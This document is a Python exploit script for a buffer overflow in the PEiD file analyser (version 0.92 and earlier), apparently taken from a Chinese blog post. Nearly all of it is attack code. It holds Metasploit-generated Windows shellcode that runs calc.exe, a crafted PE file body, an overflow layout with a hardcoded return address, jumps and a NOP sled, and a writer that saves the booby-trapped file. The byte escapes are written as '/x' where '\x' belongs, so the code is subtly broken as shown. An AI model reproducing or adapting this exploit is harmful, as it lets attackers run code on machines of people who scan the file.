- #
- # Peid <= 0.92 PE Buffer Overflow Vulnerability
- # Vulnerability discovered by Lord Yup
- # Exploited by renzhacheng For CN version
- # renzhacheng [at] Gmail [dot] com
- # http://renzhacheng.blogspot.com
- #
- import sys
- # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
- shellcode = (
- "/x29/xc9/x83/xe9/xdd/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x19"
- "/xc5/xd8/x59/x83/xeb/xfc/xe2/xf4/xe5/x2d/x9c/x59/x19/xc5/x53/x1c"
- "/x25/x4e/xa4/x5c/x61/xc4/x37/xd2/x56/xdd/x53/x06/x39/xc4/x33/x10"
- "/x92/xf1/x53/x58/xf7/xf4/x18/xc0/xb5/x41/x18/x2d/x1e/x04/x12/x54"
- "/x18/x07/x33/xad/x22/x91/xfc/x5d/x6c/x20/x53/x06/x3d/xc4/x33/x3f"
- "/x92/xc9/x93/xd2/x46/xd9/xd9/xb2/x92/xd9/x53/x58/xf2/x4c/x84/x7d"
- "/x1d/x06/xe9/x99/x7d/x4e/x98/x69/x9c/x05/xa0/x55/x92/x85/xd4/xd2"
- "/x69/xd9/x75/xd2/x71/xcd/x33/x50/x92/x45/x68/x59/x19/xc5/x53/x31"
- "/x25/x9a/xe9/xaf/x79/x93/x51/xa1/x9a/x05/xa3/x09/x71/x35/x52/x5d"
- "/x46/xad/x40/xa7/x93/xcb/x8f/xa6/xfe/xa6/xb9/x35/x7a/xeb/xbd/x21"
- "/x7c/xc5/xd8/x59")
- def help_info():
- print ("Usage: /n/t"+sys.argv[0]+" <FileName>/n")
- exploit = ("/x4D/x5A/x90/x00/x03/x00/x00/x00/x04/x00/x00/x00/xFF/xFF/x00/x00/xB8/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xC8/x00/x00/x00"
- "/x0E/x1F/xBA/x0E/x00/xB4/x09/xCD/x21/xB8/x01/x4C/xCD/x21/x54/x68/x69/x73/x20/x70/x72/x6F/x67/x72/x61/x6D/x20/x63/x61/x6E/x6E/x6F"
- "/x74/x20/x62/x65/x20/x72/x75/x6E/x20/x69/x6E/x20/x44/x4F/x53/x20/x6D/x6F/x64/x65/x2E/x0D/x0D/x0A/x24/x00/x00/x00/x00/x00/x00/x00"
- "/xA5/x8A/x2D/xC7/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xBE/xC9/x48/x94/xE4/xEB/x43/x94/xE1/xEB/x42/x94/xEA/xEB/x43/x94"
- "/x83/xF4/x50/x94/xE4/xEB/x43/x94/x09/xF4/x48/x94/xE3/xEB/x43/x94/x52/x69/x63/x68/xE1/xEB/x43/x94/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x50/x45/x00/x00/x4C/x01/x03/x00/x86/xE1/x38/x49/x00/x00/x00/x00/x00/x00/x00/x00/xE0/x00/x0F/x01"
- "/x0B/x01/x06/x00/x00/x02/x00/x00/x00/x06/x00/x00/x00/x00/x00/x00/x72/x10/x00/x00/x00/x10/x00/x00/x00/x20/x00/x00/x00/x00/x40/x00"
- "/x00/x10/x00/x00/x00/x02/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x04/x00/x00"
- "/x00/x00/x00/x00/x03/x00/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x00/x00/x10/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x30/x20/x00/x00/x3C/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x20/x00/x00/x30/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x2E/x74/x65/x78/x74/x00/x00/x00/xFC/x01/x00/x00/x00/x10/x00/x00/x00/x02/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x20/x00/x00/x60/x2E/x72/x64/x61/x74/x61/x00/x00/x44/x01/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x06/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x40/x2E/x64/x61/x74/x61/x00/x00/x00/x3C/x02/x00/x00/x00/x30/x00/x00"
- "/x00/x02/x00/x00/x00/x08/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x6A/x00/x68/x28/x30/x40/x00/x68/x18/x30/x40/x00/x6A/x00/xFF/x15/x24/x20/x40/x00/x68/x08/x30/x40/x00/xE8/x12/x00/x00/x00/x83/xC4"
- "/x04/x33/xC0/xC3/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x55/x8B/xEC/x81/xEC/x04/x04/x00/x00/x8D/x45/x0C/x56/x50/x8D/x85"
- "/xFC/xFB/xFF/xFF/xFF/x75/x08/x50/xFF/x15/x28/x20/x40/x00/x8B/xF0/x8D/x45/xFC/x6A/x00/x50/x8D/x85/xFC/xFB/xFF/xFF/x56/x50/x6A/xF5"
- "/xFF/x15/x08/x20/x40/x00/x50/xFF/x15/x04/x20/x40/x00/x8B/xC6/x5E/xC9/xC3/x56/xE8/x83/x00/x00/x00/x8B/xF0/xE8/x48/x00/x00/x00/x68"
- "/x04/x30/x40/x00/x68/x00/x30/x40/x00/xE8/x1F/x00/x00/x00/x6A/x00/x68/x38/x30/x40/x00/x56/xE8/x65/xFF/xFF/xFF/x83/xC4/x14/x8B/xF0"
- "/xE8/x3A/x00/x00/x00/x56/xFF/x15/x0C/x20/x40/x00/x5E/x56/x8B/x74/x24/x08/x3B/x74/x24/x0C/x73/x0D/x8B/x06/x85/xC0/x74/x02/xFF/xD0"
- "/x83/xC6/x04/xEB/xED/x5E/xC3/x6A/x20/x58/x6A/x04/x50/xA3/x30/x30/x40/x00/xE8/x0B/x01/x00/x00/x59/xA3/x2C/x30/x40/x00/x59/xC3/x8B"
- "/x0D/x34/x30/x40/x00/x85/xC9/x74/x11/xA1/x2C/x30/x40/x00/x8D/x0C/x88/x51/x50/xE8/xB5/xFF/xFF/xFF/x59/x59/xC3/x53/x56/x33/xDB/x57"
- "/x89/x1D/x38/x30/x40/x00/xFF/x15/x1C/x20/x40/x00/x8B/xF8/x57/xFF/x15/x18/x20/x40/x00/x40/x50/x53/xFF/x15/x14/x20/x40/x00/x50/xFF"
- "/x15/x00/x20/x40/x00/x8B/xF0/x3B/xF3/x75/x07/x33/xC0/xE9/xAC/x00/x00/x00/x57/x56/xFF/x15/x10/x20/x40/x00/x80/x3E/x22/x75/x1A/x46"
- "/x89/x35/x38/x30/x40/x00/x8A/x06/x3A/xC3/x74/x07/x3C/x22/x74/x03/x46/xEB/xF3/x38/x1E/x75/x1D/xEB/xD2/x89/x35/x38/x30/x40/x00/x8A"
- "/x06/x3A/xC3/x74/x0B/x3C/x20/x74/x07/x3C/x09/x74/x03/x46/xEB/xEF/x38/x1E/x74/x03/x88/x1E/x46/x6A/x01/xB9/x3C/x30/x40/x00/x58/x8A"
- "/x16/x3A/xD3/x74/x05/x80/xFA/x20/x74/x05/x80/xFA/x09/x75/x03/x46/xEB/xED/x8A/x16/x3A/xD3/x74/x46/x80/xFA/x22/x75/x17/x46/x40/x89"
- "/x31/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3/x74/x23/x80/xFA/x22/x74/x1E/x46/xEB/xF2/x89/x31/x40/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3"
- "/x74/x0D/x80/xFA/x20/x74/x08/x80/xFA/x09/x74/x03/x46/xEB/xED/x38/x1E/x74/x0B/x88/x1E/x46/x81/xF9/x38/x32/x40/x00/x7C/xA1/x5F/x5E"
- "/x5B/xC3/x8B/x44/x24/x04/x0F/xAF/x44/x24/x08/x50/x6A/x08/xFF/x15/x14/x20/x40/x00/x50/xFF/x15/x00/x20/x40/x00/xC3/x00/x00/x00/x00"
- "/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00"
- "/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/x90/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xAA/x20/x00/x00"
- "/x24/x20/x00/x00/x6C/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x28/x21/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00"
- "/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/xBE/x01/x4D/x65"
- "/x73/x73/x61/x67/x65/x42/x6F/x78/x41")
- code_len = 564 - (len(shellcode) + 100)
- overflow1 = "/x41" * 100
- overflow2 = "/x41" * code_len
- overflow3 = "/x90" * 3
- eip = "/x12/x45/xfa/x7f"
- long_jmp = "/xe9/x0b/xfe/xff/xff"
- nopsled = "/x90" * 20
- exploit = exploit+overflow1+shellcode+overflow2+long_jmp+overflow3+eip+long_jmp+nopsled+shellcode+overflow2
- exploit += (
- "/x00/x55/x53/x45/x52/x33/x32/x2E/x64/x6C/x6C/x00/x00/xDF/x02/x57/x72/x69/x74/x65/x46/x69/x6C/x65/x00/x52/x01/x47/x65/x74/x53/x74"
- "/x64/x48/x61/x6E/x64/x6C/x65/x00/x00/x7D/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00/x02/x03/x6C/x73/x74/x72/x63/x70/x79"
- "/x41/x00/x00/x99/x01/x48/x65/x61/x70/x41/x6C/x6C/x6F/x63/x00/x40/x01/x47/x65/x74/x50/x72/x6F/x63/x65/x73/x73/x48/x65/x61/x70/x00"
- "/x00/x08/x03/x6C/x73/x74/x72/x6C/x65/x6E/x41/x00/x00/xCA/x00/x47/x65/x74/x43/x6F/x6D/x6D/x61/x6E/x64/x4C/x69/x6E/x65/x41/x00/x4B"
- "/x45/x52/x4E/x45/x4C/x33/x32/x2E/x64/x6C/x6C/x00/x00/xAE/x02/x77/x76/x73/x70/x72/x69/x6E/x74/x66/x41/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x48"
- "/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x0A/x00/x00/x00/x48/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
- "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00")
- if len(sys.argv)<=1:
- help_info()
- sys.exit(1)
- elif (len(sys.argv) ==2):
- file = sys.argv[1]
- print "[+] Creating File...",
- try:
- out_file = open(file,'w')
- out_file.write(exploit)
- out_file.close()
- print "OK"
- except:
- print "Error!"
- sys.exit(1)
- sys.exit(0)
- else :
- print "Error input"
- sys.exit(1)
PEiD &lt;= 0.92 Buffer Overflow Exploit
最新推荐文章于 2022-12-09 11:17:54 发布